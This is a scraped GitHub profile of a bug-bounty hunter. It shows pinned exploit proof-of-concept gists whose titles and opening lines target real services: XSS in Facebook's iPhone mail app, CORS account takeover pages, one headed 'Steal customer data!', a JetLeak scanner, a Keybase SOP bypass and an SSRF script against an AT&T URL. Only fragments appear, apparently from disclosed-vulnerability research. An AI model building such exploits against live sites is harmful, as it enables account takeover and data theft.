Skip to content
View andripwn's full-sized avatar
☺️
Taking it easy
☺️
Taking it easy

Organizations

@BugHunterID @RepublicR0K

Block or report andripwn

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. iPhone app XSS in Facebook Mail iPhone app XSS in Facebook Mail
    1
    <script type="text/javascript" src="https://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
    2
    <script type="text/javascript">
    3
        // https://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
    4
        $(function(){
    5
            parse_messages = function()
  2. Full Account Takeover through CORS w... Full Account Takeover through CORS with connection Sockets
    1
    <!DOCTYPE html>
    2
    <html>
    3
    <head><title>Exploiting CORS</title></head>
    4
    <body>
    5
    <center>
  3. Vulnerable to JetLeak Vulnerable to JetLeak
    1
    import httplib, urllib, ssl, string, sys, getopt
    2
    import datetime
    3
    from urlparse import urlparse
    4
    
                  
    5
    f = open('jetleak_' + datetime.datetime.now().strftime('%Y%m%d_%H_%M') + '.txt', 'w')
  4. Cross Origin Resource Sharing Miscon... Cross Origin Resource Sharing Misconfiguration
    1
    <!DOCTYPE html>
    2
    <html>
    3
    <body>
    4
    <center>
    5
    <h3>Steal customer data!</h3>
  5. SOP bypass using browser cache (http... SOP bypass using browser cache (https://hackerone.com/reports/761726)
    1
    <html>
    2
    <script>  
    3
    var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}";  
    4
    fetch(url, {    
    5
        method: 'GET',    
  6. ssrf.py ssrf.py
    1
    import requests
    2
    
                  
    3
    url = "https://onlinefaxtwo.att.com/loa.php"
    4
    
                  
    5